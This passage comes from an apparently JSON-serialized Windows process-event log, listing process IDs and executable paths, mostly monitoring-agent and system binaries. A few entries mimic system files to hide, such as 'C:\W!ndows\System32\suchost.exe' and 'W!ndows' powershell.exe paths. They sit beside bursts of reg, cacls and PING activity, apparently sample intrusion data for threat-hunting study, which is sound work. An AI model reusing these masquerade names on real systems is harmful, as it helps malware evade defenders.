\",\"0xb3c\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x12e0\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1f60\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xfc8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xadc\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xeb0\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x107c\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xc5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0xd44\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"NaN\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"NaN\",\"0x864\",\"0x8dc\",\"0x864\",\"0xd74\",\"0x864\",\"0x6f8\",\"0x864\",\"0x1fc0\",\"0x864\",\"0x10bc\",\"0x864\",\"0xb48\",\"0x864\",\"0xbd0\",\"0x864\",\"0x15c8\",\"0x864\",\"0xe34\",\"0x864\",\"0x53c\",\"0x864\",\"0xef4\",\"0x864\",\"0xcd8\",\"NaN\",\"0x181c\",\"0xbc\",\"NaN\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\",\"NaN\",\"0x7c8\",\"0x1420\",\"0x1420\",\"0x9ac\",\"0x1078\",\"0x7c8\",\"0x1a44\",\"0x1a44\",\"0x7c8\",\"0x99c\",\"0x7c8\",\"0x7c8\",\"0x205c\",\"0x205c\",\"NaN\",\"0xaec\",\"0xaec\",\"0xaec\",\"0xc14\",\"0x1f24\",\"0xaec\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\suchost.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\Speech_OneCore\\\\Common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\